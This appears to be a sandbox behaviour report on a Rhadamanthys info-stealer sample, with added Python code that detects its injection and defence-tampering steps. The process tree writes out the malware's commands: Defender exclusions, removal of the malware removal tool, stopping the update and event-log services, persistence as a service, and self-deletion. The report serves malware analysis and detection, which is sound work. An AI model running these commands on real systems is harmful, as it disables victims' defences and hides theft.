Analysis
max time kernel: 31s
max time network: 24s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05-04-2024 08:27
Static task: static1
Behavioral task: behavioral1
Sample: dd.exe
Resource: win10v2004-20240226-en
General
Target: dd.exe
Size: 74KB
MD5: 8fb7a6bd32200aea3f517923285e39a8
SHA1: dc5c1e8293cce5d82c5d7d338fb3cee57d2b997d
SHA256: ccc95afa02727297eb7f6bbbe5e06d011ce4656c3b563e2841fad60d471e2f26
SHA512: 1445bc293350022e9302374df3915e71f3b8bd281db5a43bf67362b002896404e21a58e68963a6203d6ab04dffd5745c2ce1d2fbd650975936b327befa15e3a1
SSDEEP: 384:UWWFjyor85Z6coSQJ14p9FfVg6FHkosvxB2JeJhrpX5m4KbfocN4UCMfKqIOmRUG:ua5ZRo34pdsvpA1c3UzD9eXOeOiict9
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes (description / pid / process / target process):
  PID 3028 created 2896   3028   liccheck.exe   sihost.exe
The process tree below shows the resulting child, dialer.exe (PID 4520), parented to sihost.exe (PID 2896) rather than to liccheck.exe (PID 3028), which is the parent-PID spoofing pattern this signature covers.
Blocklisted process makes network request 1 IoCs
Processes (flow / pid / process):
  20   3152   powershell.exe
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description / ioc / process):
  Key value queried   \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation   dd.exe
Executes dropped EXE 4 IoCs
Processes (pid / process):
  3512   lic.exe
  3028   liccheck.exe
  4960   LicGet.exe
  4792   ebvoxlrooljj.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes (description / ioc / process):
  Set value (str)   \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" "   LicGet.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes (description / ioc / process):
  File opened for modification   C:\Windows\system32\MRT.exe   lic.exe
MRT.exe is the Windows Malicious Software Removal Tool; the same sample also uninstalls its update package (wusa /uninstall /kb:890830) in the process tree below.
Suspicious use of SetThreadContext 1 IoCs
Processes (description / pid / process / target process):
  PID 3512 set thread context of 3692   3512   lic.exe   dialer.exe
lic.exe also writes into PID 3692 seven times (see WriteProcessMemory below); creating dialer.exe, writing into it and then resetting its thread context is the process-hollowing pattern.
Launches sc.exe 9 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes (pid / process):
  4876   sc.exe
  4344   sc.exe
  2228   sc.exe
  3948   sc.exe
  1408   sc.exe
  3028   sc.exe
  3880   sc.exe
  2516   sc.exe
  4488   sc.exe
Note that PID 3028 is reported both for liccheck.exe and for one sc.exe instance (Windows reuses PIDs after a process exits), so a PID alone does not identify a process in this report; correlate PID with image name.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes (pid / process / number of hits):
  3152   powershell.exe     2
  3004   powershell.exe     2
  3028   liccheck.exe       2
  4520   dialer.exe         4
  3512   lic.exe            17
  3628   powershell.exe     3
  3692   dialer.exe         4
  4792   ebvoxlrooljj.exe   1
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes (description / pid / process):
  Token: SeDebugPrivilege            3152   powershell.exe
  Token: SeDebugPrivilege            3004   powershell.exe
  Token: SeDebugPrivilege            3628   powershell.exe
  Token: SeShutdownPrivilege         2888   powercfg.exe
  Token: SeCreatePagefilePrivilege   2888   powercfg.exe
  Token: SeDebugPrivilege            3512   lic.exe
  Token: SeShutdownPrivilege         3908   powercfg.exe
  Token: SeCreatePagefilePrivilege   3908   powercfg.exe
  Token: SeDebugPrivilege            3692   dialer.exe
  Token: SeShutdownPrivilege         636    powercfg.exe
  Token: SeCreatePagefilePrivilege   636    powercfg.exe
  Token: SeShutdownPrivilege         2988   powercfg.exe
  Token: SeCreatePagefilePrivilege   2988   powercfg.exe
Suspicious use of WriteProcessMemory 47 IoCs
Processes (pid / process -> target pid / target process / number of writes):
  3448   dd.exe           -> 3152   powershell.exe   3
  3152   powershell.exe   -> 3004   powershell.exe   3
  3152   powershell.exe   -> 3512   lic.exe          2
  3152   powershell.exe   -> 3028   liccheck.exe     3
  3152   powershell.exe   -> 4960   LicGet.exe       2
  3028   liccheck.exe     -> 4520   dialer.exe       5
  5108   cmd.exe          -> 1064   wusa.exe         2
  3512   lic.exe          -> 3692   dialer.exe       7
  3692   dialer.exe       -> 616    winlogon.exe     1
  3692   dialer.exe       -> 672    lsass.exe        1
  3692   dialer.exe       -> 960    svchost.exe      1
  3692   dialer.exe       -> 316    dwm.exe          1
  3692   dialer.exe       -> 716    svchost.exe      1
  3692   dialer.exe       -> 924    svchost.exe      1
  3692   dialer.exe       -> 1088   svchost.exe      1
  3692   dialer.exe       -> 1124   svchost.exe      1
  3692   dialer.exe       -> 1136   svchost.exe      1
  3692   dialer.exe       -> 1152   svchost.exe      1
  672    lsass.exe        -> 2380   sysmon.exe       10
The lsass.exe -> sysmon.exe writes start only after dialer.exe (PID 3692) has written into lsass.exe (PID 672), consistent with code injected into lsass.exe doing the writing rather than lsass.exe itself.
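The injection signatures above are easier to read as a graph than as a flat list: who wrote into whom, in what order, and which process is displayed under a parent that never wrote into it. The following is an added example, not sandbox output or code from the sample's author: it parses "wrote to memory of" lines of the form used in this report (a constructed subset of the IoCs above), walks the write graph to protected system images, and flags a child whose displayed parent differs from its first writer (the liccheck.exe -> dialer.exe case behind the NtCreateUserProcessOtherParentProcess signature). The protected-image and session-host lists, the tree-parent map and the "first writer is the creator" rule are assumptions of the example.

```python
"""Added example (not sandbox output): rebuild the cross-process write graph
from 'wrote to memory of' IoC lines like the ones in this report, flag
injection chains into protected system processes, and flag parent-PID
spoofing candidates. Sample lines are a constructed subset of the report;
the image lists and the tree-parent map are this example's assumptions."""
import re
from collections import defaultdict

# Constructed sample: a subset of the WriteProcessMemory IoCs reported above.
SAMPLE_IOCS = """
PID 3448 wrote to memory of 3152 3448 dd.exe powershell.exe
PID 3152 wrote to memory of 3512 3152 powershell.exe lic.exe
PID 3028 wrote to memory of 4520 3028 liccheck.exe dialer.exe
PID 3512 wrote to memory of 3692 3512 lic.exe dialer.exe
PID 3512 wrote to memory of 3692 3512 lic.exe dialer.exe
PID 3692 wrote to memory of 616 3692 dialer.exe winlogon.exe
PID 3692 wrote to memory of 672 3692 dialer.exe lsass.exe
PID 3692 wrote to memory of 960 3692 dialer.exe svchost.exe
PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe
""".strip().splitlines()

# Constructed: parent (pid, image) as displayed by the process tree for a few
# children (dialer.exe 4520 is shown under sihost.exe 2896 in the tree).
TREE_PARENT = {
    3152: (3448, "dd.exe"),
    3512: (3152, "powershell.exe"),
    3692: (3512, "lic.exe"),
    4520: (2896, "sihost.exe"),
}

IOC_RE = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) \d+ (?P<src_img>\S+) (?P<dst_img>\S+)"
)

# Assumption: images user-land code should never write into, and which never
# write into other processes themselves (a write *from* one means it is hijacked).
PROTECTED = {"lsass.exe", "winlogon.exe", "svchost.exe", "dwm.exe", "sysmon.exe"}
# Assumption: long-lived session hosts that PPID spoofers like to claim as parent.
SPOOF_PARENTS = {"sihost.exe", "explorer.exe", "svchost.exe", "runtimebroker.exe"}


def parse_writes(lines):
    """Return deduplicated (src_pid, src_img, dst_pid, dst_img) edges in report order."""
    edges, seen = [], set()
    for line in lines:
        m = IOC_RE.search(line)
        if not m:
            continue
        e = (int(m["src"]), m["src_img"].lower(), int(m["dst"]), m["dst_img"].lower())
        if e not in seen:
            seen.add(e)
            edges.append(e)
    return edges


def injection_chains(edges):
    """Walk writes from root writers; return every path that reaches a protected image.
    A path ... -> dialer.exe -> lsass.exe -> sysmon.exe shows that the write into
    sysmon.exe was issued by code running inside lsass.exe."""
    out = defaultdict(list)
    for s_pid, s_img, d_pid, d_img in edges:
        out[(s_pid, s_img)].append((d_pid, d_img))
    targets = {d for ds in out.values() for d in ds}
    roots = [w for w in out if w not in targets]
    chains = []

    def walk(node, path):
        path = path + [node]
        for nxt in out.get(node, []):
            if nxt in path:            # cycle guard: PID reuse can create loops
                continue
            if nxt[1] in PROTECTED:
                chains.append(path + [nxt])
            walk(nxt, path)

    for r in roots:
        walk(r, [])
    return chains


def spoofed_parent_candidates(edges, tree_parent):
    """Flag a child displayed under a session host whose first writer (assumed to
    be the real creator filling in the new process) is a different process."""
    first_writer = {}
    for s_pid, s_img, d_pid, _ in edges:
        first_writer.setdefault(d_pid, (s_pid, s_img))
    hits = []
    for child, (p_pid, p_img) in tree_parent.items():
        w = first_writer.get(child)
        if w and p_img.lower() in SPOOF_PARENTS and w[0] != p_pid:
            hits.append((child, p_pid, p_img, w[0], w[1]))
    return hits


if __name__ == "__main__":
    edges = parse_writes(SAMPLE_IOCS)
    for chain in injection_chains(edges):
        print(" -> ".join(f"{img}({pid})" for pid, img in chain))
    for child, p_pid, p_img, w_pid, w_img in spoofed_parent_candidates(edges, TREE_PARENT):
        print(f"PID {child}: shown under {p_img}({p_pid}) but first written by {w_img}({w_pid})")
```

On the sample above this yields four chains rooted at dd.exe, the longest being dd.exe -> powershell.exe -> lic.exe -> dialer.exe -> lsass.exe -> sysmon.exe, and one spoofed-parent candidate (dialer.exe 4520 shown under sihost.exe but first written by liccheck.exe). The "first writer is the creator" rule holds for this sandbox's output, where every parent writes into a freshly created child; on telemetry that does not record those startup writes, use the creator PID from the process-creation event instead.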
Processes
- C:\Windows\system32\winlogon.exe  (PID 616)  command line: winlogon.exe
  - C:\Windows\system32\dwm.exe  (PID 316)  command line: "dwm.exe"
- C:\Windows\system32\lsass.exe  (PID 672)  command line: C:\Windows\system32\lsass.exe
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\svchost.exe  (PID 960)  command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe  (PID 716)  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe  (PID 924)  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\system32\svchost.exe  (PID 1088)  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
- C:\Windows\system32\svchost.exe  (PID 1124)  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\System32\svchost.exe  (PID 1136)  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe  (PID 1152)  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\sysmon.exe  (PID 2380)  command line: C:\Windows\sysmon.exe
- C:\Windows\system32\sihost.exe  (PID 2896)  command line: sihost.exe
  - C:\Windows\SysWOW64\dialer.exe  (PID 4520)  command line: "C:\Windows\system32\dialer.exe"
    - Suspicious behavior: EnumeratesProcesses
- C:\Users\Admin\AppData\Local\Temp\dd.exe  (PID 3448)  command line: "C:\Users\Admin\AppData\Local\Temp\dd.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 3152)  command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 3004)  command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#ufh#>[System.Windows.Forms.MessageBox]::Show('No license! Connect your Steam account in order to get a license. Make sure that you are not using alternative account, otherwise license will not be given. (This is done to prevent cracking)','','OK','Warning')<#zqe#>;
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Roaming\lic.exe  (PID 3512)  command line: "C:\Users\Admin\AppData\Roaming\lic.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 3628)  command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\cmd.exe  (PID 5108)  command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\wusa.exe  (PID 1064)  command line: wusa /uninstall /kb:890830 /quiet /norestart
      - C:\Windows\system32\sc.exe  (PID 2228)  command line: C:\Windows\system32\sc.exe stop UsoSvc
        - Launches sc.exe
      - C:\Windows\system32\sc.exe  (PID 3880)  command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
        - Launches sc.exe
      - C:\Windows\system32\sc.exe  (PID 2516)  command line: C:\Windows\system32\sc.exe stop wuauserv
        - Launches sc.exe
      - C:\Windows\system32\sc.exe  (PID 4488)  command line: C:\Windows\system32\sc.exe stop bits
        - Launches sc.exe
      - C:\Windows\system32\sc.exe  (PID 3948)  command line: C:\Windows\system32\sc.exe stop dosvc
        - Launches sc.exe
      - C:\Windows\system32\powercfg.exe  (PID 3908)  command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe  (PID 2888)  command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe  (PID 636)  command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe  (PID 2988)  command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\dialer.exe  (PID 3692)  command line: C:\Windows\system32\dialer.exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\sc.exe  (PID 1408)  command line: C:\Windows\system32\sc.exe delete "FJIEXRSL"
        - Launches sc.exe
      - C:\Windows\system32\sc.exe  (PID 3028)  command line: C:\Windows\system32\sc.exe create "FJIEXRSL" binpath= "C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe" start= "auto"
        - Launches sc.exe
      - C:\Windows\system32\sc.exe  (PID 4344)  command line: C:\Windows\system32\sc.exe stop eventlog
        - Launches sc.exe
      - C:\Windows\system32\sc.exe  (PID 4876)  command line: C:\Windows\system32\sc.exe start "FJIEXRSL"
        - Launches sc.exe
      - C:\Windows\system32\cmd.exe  (PID 1184)  command line: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\lic.exe"
    - C:\Users\Admin\AppData\Roaming\liccheck.exe  (PID 3028)  command line: "C:\Users\Admin\AppData\Roaming\liccheck.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Roaming\LicGet.exe  (PID 4960)  command line: "C:\Users\Admin\AppData\Roaming\LicGet.exe"
      - Executes dropped EXE
      - Adds Run key to start application
- C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe  (PID 4792)  command line: C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 2744)  command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
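The lic.exe subtree above is a compact defence-tampering sequence: Defender exclusions for the whole user profile and ProgramData, removal of the MSRT package (KB890830), stops of the update and BITS services and of eventlog, powercfg sleep and hibernate timeouts set to 0, a randomly named service whose binary lives under C:\ProgramData, and a choice/Del self-deletion of the dropper. The following is an added example, not sandbox output or code from the sample's author: it expresses each step as a command-line rule and evaluates them over process events constructed from the tree above, reporting the matched rules, the created service and a verdict. The rule names, the ATT&CK labels, the four-distinct-rules threshold and the benign control line are assumptions of the example.

```python
"""Added example (not sandbox output): command-line detection rules for the
defence-tampering sequence in the process tree above, evaluated over events
constructed from that tree. Rule names, ATT&CK labels, the threshold and the
benign control line are this example's own assumptions."""
import re

# Constructed from the process tree above: (pid, image, command line).
EVENTS = [
    (3628, "powershell.exe", r"powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    (1064, "wusa.exe", r"wusa /uninstall /kb:890830 /quiet /norestart"),
    (2228, "sc.exe", r"sc.exe stop UsoSvc"),
    (3880, "sc.exe", r"sc.exe stop WaaSMedicSvc"),
    (2516, "sc.exe", r"sc.exe stop wuauserv"),
    (4488, "sc.exe", r"sc.exe stop bits"),
    (3948, "sc.exe", r"sc.exe stop dosvc"),
    (3908, "powercfg.exe", r"powercfg.exe /x -hibernate-timeout-ac 0"),
    (2888, "powercfg.exe", r"powercfg.exe /x -hibernate-timeout-dc 0"),
    (636, "powercfg.exe", r"powercfg.exe /x -standby-timeout-ac 0"),
    (2988, "powercfg.exe", r"powercfg.exe /x -standby-timeout-dc 0"),
    (1408, "sc.exe", r'sc.exe delete "FJIEXRSL"'),
    (3028, "sc.exe", r'sc.exe create "FJIEXRSL" binpath= "C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe" start= "auto"'),
    (4344, "sc.exe", r"sc.exe stop eventlog"),
    (4876, "sc.exe", r'sc.exe start "FJIEXRSL"'),
    (1184, "cmd.exe", r'cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\lic.exe"'),
    (4242, "sc.exe", r"sc.exe query wuauserv"),   # constructed benign control line, must not match
]

# (rule name, ATT&CK technique or None, case-insensitive regex over the command line)
RULES = [
    ("defender_exclusion", "T1562.001", r"Add-MpPreference\b.*-Exclusion(?:Path|Extension|Process)"),
    ("msrt_uninstall", "T1562.001", r"\bwusa(?:\.exe)?\s+/uninstall\s+/kb:890830\b"),
    ("update_service_stop", "T1489", r"\bsc(?:\.exe)?\s+stop\s+(?:UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b"),
    ("eventlog_stop", "T1562.002", r"\bsc(?:\.exe)?\s+stop\s+eventlog\b"),
    ("service_in_programdata", "T1543.003", r"\bsc(?:\.exe)?\s+create\s+\S+\s+binpath=\s*\"?[a-z]:\\ProgramData\\"),
    ("sleep_disabled", None, r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b"),
    ("self_delete", "T1070.004", r"\bchoice\s+/C\s+Y\b.*&\s*Del\s+"),
]
COMPILED = [(name, tech, re.compile(pat, re.I)) for name, tech, pat in RULES]

# Pulls service name and binary path out of an `sc create <name> binpath= "<path>"` line.
CREATE_RE = re.compile(r'\bsc(?:\.exe)?\s+create\s+"?(?P<svc>[^"\s]+)"?\s+binpath=\s*"(?P<bin>[^"]+)"', re.I)


def match_rules(cmdline):
    """Names of all rules whose regex fires on one command line."""
    return [name for name, _, rx in COMPILED if rx.search(cmdline)]


def service_from_create(cmdline):
    """(service name, binary path) for an sc create line, else None."""
    m = CREATE_RE.search(cmdline)
    return (m["svc"], m["bin"]) if m else None


def triage(events, min_distinct=4):
    """Evaluate every rule over every event. Individual hits (one stopped service,
    one powercfg call) are noisy on admin hosts; the verdict therefore counts how
    many *distinct* tamper rules fired, not how many events did."""
    hits = []
    for pid, image, cmd in events:
        for name, technique, rx in COMPILED:
            if rx.search(cmd):
                hits.append((pid, image, name, technique))
    distinct = sorted({h[2] for h in hits})
    services = [s for _, _, cmd in events if (s := service_from_create(cmd))]
    verdict = "tamper-chain" if len(distinct) >= min_distinct else "isolated"
    return {"hits": hits, "distinct_rules": distinct, "services": services, "verdict": verdict}


if __name__ == "__main__":
    result = triage(EVENTS)
    for pid, image, name, technique in result["hits"]:
        print(f"{pid:>5} {image:<15} {name:<24} {technique or '-'}")
    print("services created:", result["services"])
    print("verdict:", result["verdict"], "with", len(result["distinct_rules"]), "distinct rules")
```

The threshold matters more than any single pattern: `sc stop wuauserv` or a powercfg change alone is routine administration, and the constructed `sc.exe query wuauserv` line shows that a query never fires. Seven distinct rules across one process subtree, with a service binary under C:\ProgramData, is what makes this run worth paging on; on live telemetry, group events by the subtree's root PID (lic.exe 3512 here) before counting.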
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (2)
    Windows Service (2)
Downloads
-
Filesize: 2.0MB
MD5: 2152b66bc007aa031bfec4b924dc36e4
SHA1: 1ada87dbaf15ac3d9015168aaebbf3a80d2b27a2
SHA256: ee2bd263eeb20744ea6c705d8f374c751cee10c994db2479f05fe717c5f9722e
SHA512: e1700ff49b8eb76bd175325e0a21d33cc6251121efe33441095b1aec8aa4d0fed990b7bd40b8333f204986eeebbb9d1cd83612e1e5bbf77619a92e6f252a9011
-
Filesize: 2.1MB
MD5: 55af12001648fbcdea3e6360e3cca3f6
SHA1: 8da53c95df58e70a77a9b85efbb5678b756390a0
SHA256: 8b008106f46a867ae75d3ca71efd3db42c5f56336f05f3edc82941b23cc000bb
SHA512: 772a5313813e71f7e15d0f1f5841ea46338883534d915045770892a7181d527c47dec485caba6a40d49da7b17a81bf0d9cdac2f16aff22908af249c6422f2be6
-
Filesize: 2KB
MD5: 33943ddf7ab410f98e2bff392ed62441
SHA1: f27016ff8b33cb2b8df39364d0ae2bf8a2c00e52
SHA256: 186b4f81ac762e8bda66248fd38ce38190d108b5c430293f64c1dcef5ff32b65
SHA512: 918d18568c816149d1dd848e1a5bfba9f3e84c9e4e23d4e4982c05cf9366ceac265ba82333aa2a917d2374fd6eb62877f28a92b226baee03918d8608af2d7ede
-
Filesize: 53KB
MD5: 06ad34f9739c5159b4d92d702545bd49
SHA1: 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256: 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512: c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize: 19KB
MD5: 2c264d386f88721214e2e733807cfcba
SHA1: 07ed72407414300c13470cd4bf90344c054f023b
SHA256: 356bbc26d3f4804ed6e984d8b3ca9c2bd0209dfde5ba5b0870750b6ae716275d
SHA512: 35f9ff405912047bfa71940cbe40da5f96eec4ddd8930713bb3e1a765b25aff805e19de51eca370082800fb7791aeef84f051d84a223f6303df37ca94b788eae
-
Filesize: 17KB
MD5: aa5da689b75ca139a0e0618c9f9819a9
SHA1: ec7e26f6c65ee2da2523884f817a700b972a9b0a
SHA256: 49f1b1af173487e946de16985859c99b849637c8205ba4fecf1653b9c32b9275
SHA512: 33c5b1b0f65cdc81dd1e64b9e978871b1b90eee718f5de5810a3dd3b1a5a9931515638fae7ae97bb09b12111350b7da4b332e2cb7b145b3b6e1be766d17a9644
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 98KB
MD5: d505d50ab745d07a7c9cba97717febe4
SHA1: 528d34e656da344a33a5e3fe27ac43ad5f7dfd0a
SHA256: 87fad0da502598adcb3da26c2a260cefcec7f383d73b62f94d7c8175812c0fad
SHA512: 28a8975b6133c366cdcde075acbec07ce7be6fa7a98387dabe5d5c5024368ac9663705d668b1c48f4da6ae8b0f6b95798ac1e4abada6a5a885d431467c8febf1
-
Filesize: 2.8MB
MD5: 87f351e454deded1b279aef5a5d632e9
SHA1: a936b08d94983f58a31f1207d73fd640fcbabd1a
SHA256: 5543ea3c67eb8e9bb763a54e80a042dfa7b297d62610e7fe057d0fc7be49212c
SHA512: 3c40874adc3ea30d147b68ba74aadb0b0228a822137dd0db04daa611a6ecc8ee8e0bfc49fb7242dee60bc2fa6860575f4061c7ff8aa9e4105550c710316f2b8f
-
Filesize: 355KB
MD5: 091267b13791fb80a21044c473e74298
SHA1: 7a4240532744ccb36fbd15f179dd0799b73de881
SHA256: 7ff6d4737f39fefefa9fc6d1f3dc31fcc968d0d45bb09a364457a0af51af860f
SHA512: e69a6d7309bd73a365f088918c7cae13a8b0925f5b395e38c9cd51509d5b451694a660143f5be4d24624b51f4a4a6a1c2c0fac0a650a539386a81e4eaa7e71c2